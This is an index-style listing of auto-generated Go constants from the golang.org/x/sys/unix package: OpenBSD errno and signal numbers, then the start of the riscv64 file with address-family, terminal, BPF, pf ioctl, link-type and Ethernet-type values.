ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1676) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1677) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1678) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1679) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1680) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1681) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1682) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1683) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1684) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1685) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1686) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1687) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1688) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1689) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1690) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1691) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1692) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1693) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1694) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1695) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1696) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1697) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1698) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1699) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1700) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1701) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1702) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1703) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1704) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1705) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1706) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1707) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1708) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1709) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1710) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1711) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1712) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1713) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1714) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1715) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1716) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1717) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1718) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1719) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1720) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1721) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1722) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1723) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1728) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1729) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1730) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1731) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1732) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1733) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1734) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1735) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1736) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1737) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1738) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1739) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1740) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1741) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1742) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1743) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1744) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1745) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1746) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1747) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1748) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1749) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1750) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1751) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1752) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1753) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1754) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1755) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1756) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1757) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1758) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1759) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1760) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_openbsd_riscv64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BLUETOOTH (line 15) | AF_BLUETOOTH = 0x20 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_CNT (line 18) | AF_CNT = 0x15 constant AF_COIP (line 19) | AF_COIP = 0x14 constant AF_DATAKIT (line 20) | AF_DATAKIT = 0x9 constant AF_DECnet (line 21) | AF_DECnet = 0xc constant AF_DLI (line 22) | AF_DLI = 0xd constant AF_E164 (line 23) | AF_E164 = 0x1a constant AF_ECMA (line 24) | AF_ECMA = 0x8 constant AF_ENCAP (line 25) | AF_ENCAP = 0x1c constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IMPLINK (line 27) | AF_IMPLINK = 0x3 constant AF_INET (line 28) | AF_INET = 0x2 constant AF_INET6 (line 29) | AF_INET6 = 0x18 constant AF_IPX (line 30) | AF_IPX = 0x17 constant AF_ISDN (line 31) | AF_ISDN = 0x1a constant AF_ISO (line 32) | AF_ISO = 0x7 constant AF_KEY (line 33) | AF_KEY = 0x1e constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x24 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OSI (line 41) | AF_OSI = 0x7 constant AF_PUP (line 42) | AF_PUP = 0x4 constant AF_ROUTE (line 43) | AF_ROUTE = 0x11 constant AF_SIP (line 44) | AF_SIP = 0x1d constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ALTWERASE (line 48) | ALTWERASE = 0x200 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant B0 (line 53) | B0 = 0x0 constant B110 (line 54) | B110 = 0x6e constant B115200 (line 55) | B115200 = 0x1c200 constant B1200 (line 56) | B1200 = 0x4b0 constant B134 (line 57) | B134 = 0x86 constant B14400 (line 58) | B14400 = 0x3840 constant B150 (line 59) | B150 = 0x96 constant B1800 (line 60) | B1800 = 0x708 constant B19200 (line 61) | B19200 = 0x4b00 constant B200 (line 62) | B200 = 0xc8 constant B230400 (line 63) | B230400 = 0x38400 constant B2400 (line 64) | B2400 = 0x960 constant B28800 (line 65) | B28800 = 0x7080 constant B300 (line 66) | B300 = 0x12c constant B38400 (line 67) | B38400 = 0x9600 constant B4800 (line 68) | B4800 = 0x12c0 constant B50 (line 69) | B50 = 0x32 constant B57600 (line 70) | B57600 = 0xe100 constant B600 (line 71) | B600 = 0x258 constant B7200 (line 72) | B7200 = 0x1c20 constant B75 (line 73) | B75 = 0x4b constant B76800 (line 74) | B76800 = 0x12c00 constant B9600 (line 75) | B9600 = 0x2580 constant BIOCFLUSH (line 76) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 77) | BIOCGBLEN = 0x40044266 constant BIOCGDIRFILT (line 78) | BIOCGDIRFILT = 0x4004427c constant BIOCGDLT (line 79) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 80) | BIOCGDLTLIST = 0xc010427b constant BIOCGETIF (line 81) | BIOCGETIF = 0x4020426b constant BIOCGFILDROP (line 82) | BIOCGFILDROP = 0x40044278 constant BIOCGHDRCMPLT (line 83) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 84) | BIOCGRSIG = 0x40044273 constant BIOCGRTIMEOUT (line 85) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSTATS (line 86) | BIOCGSTATS = 0x4008426f constant BIOCIMMEDIATE (line 87) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 88) | BIOCLOCK = 0x20004276 constant BIOCPROMISC (line 89) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 90) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRFILT (line 91) | BIOCSDIRFILT = 0x8004427d constant BIOCSDLT (line 92) | BIOCSDLT = 0x8004427a constant BIOCSETF (line 93) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 94) | BIOCSETIF = 0x8020426c constant BIOCSETWF (line 95) | BIOCSETWF = 0x80104277 constant BIOCSFILDROP (line 96) | BIOCSFILDROP = 0x80044279 constant BIOCSHDRCMPLT (line 97) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 98) | BIOCSRSIG = 0x80044272 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010426d constant BIOCVERSION (line 100) | BIOCVERSION = 0x40044271 constant BPF_A (line 101) | BPF_A = 0x10 constant BPF_ABS (line 102) | BPF_ABS = 0x20 constant BPF_ADD (line 103) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 104) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 105) | BPF_ALU = 0x4 constant BPF_AND (line 106) | BPF_AND = 0x50 constant BPF_B (line 107) | BPF_B = 0x10 constant BPF_DIRECTION_IN (line 108) | BPF_DIRECTION_IN = 0x1 constant BPF_DIRECTION_OUT (line 109) | BPF_DIRECTION_OUT = 0x2 constant BPF_DIV (line 110) | BPF_DIV = 0x30 constant BPF_FILDROP_CAPTURE (line 111) | BPF_FILDROP_CAPTURE = 0x1 constant BPF_FILDROP_DROP (line 112) | BPF_FILDROP_DROP = 0x2 constant BPF_FILDROP_PASS (line 113) | BPF_FILDROP_PASS = 0x0 constant BPF_F_DIR_IN (line 114) | BPF_F_DIR_IN = 0x10 constant BPF_F_DIR_MASK (line 115) | BPF_F_DIR_MASK = 0x30 constant BPF_F_DIR_OUT (line 116) | BPF_F_DIR_OUT = 0x20 constant BPF_F_DIR_SHIFT (line 117) | BPF_F_DIR_SHIFT = 0x4 constant BPF_F_FLOWID (line 118) | BPF_F_FLOWID = 0x8 constant BPF_F_PRI_MASK (line 119) | BPF_F_PRI_MASK = 0x7 constant BPF_H (line 120) | BPF_H = 0x8 constant BPF_IMM (line 121) | BPF_IMM = 0x0 constant BPF_IND (line 122) | BPF_IND = 0x40 constant BPF_JA (line 123) | BPF_JA = 0x0 constant BPF_JEQ (line 124) | BPF_JEQ = 0x10 constant BPF_JGE (line 125) | BPF_JGE = 0x30 constant BPF_JGT (line 126) | BPF_JGT = 0x20 constant BPF_JMP (line 127) | BPF_JMP = 0x5 constant BPF_JSET (line 128) | BPF_JSET = 0x40 constant BPF_K (line 129) | BPF_K = 0x0 constant BPF_LD (line 130) | BPF_LD = 0x0 constant BPF_LDX (line 131) | BPF_LDX = 0x1 constant BPF_LEN (line 132) | BPF_LEN = 0x80 constant BPF_LSH (line 133) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 134) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 135) | BPF_MAXBUFSIZE = 0x200000 constant BPF_MAXINSNS (line 136) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 137) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 138) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 139) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 140) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 141) | BPF_MISC = 0x7 constant BPF_MSH (line 142) | BPF_MSH = 0xa0 constant BPF_MUL (line 143) | BPF_MUL = 0x20 constant BPF_NEG (line 144) | BPF_NEG = 0x80 constant BPF_OR (line 145) | BPF_OR = 0x40 constant BPF_RELEASE (line 146) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 147) | BPF_RET = 0x6 constant BPF_RND (line 148) | BPF_RND = 0xc0 constant BPF_RSH (line 149) | BPF_RSH = 0x70 constant BPF_ST (line 150) | BPF_ST = 0x2 constant BPF_STX (line 151) | BPF_STX = 0x3 constant BPF_SUB (line 152) | BPF_SUB = 0x10 constant BPF_TAX (line 153) | BPF_TAX = 0x0 constant BPF_TXA (line 154) | BPF_TXA = 0x80 constant BPF_W (line 155) | BPF_W = 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc110445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xcd604404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xcd60441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc028445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0e04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0284416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1204460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc110445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc110445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xcd604407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xcd604406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0104454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0104419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0284457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc080445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0e04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc088444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0884450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc4504443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc450443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc4504442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc4504448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc450443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc4504441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc4504444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc450443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 0xc4504446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc4504447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc450443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc4504440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc450444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc4504445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc450444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc4504449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0284459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0284414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc0104451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc0104452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc0104453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant 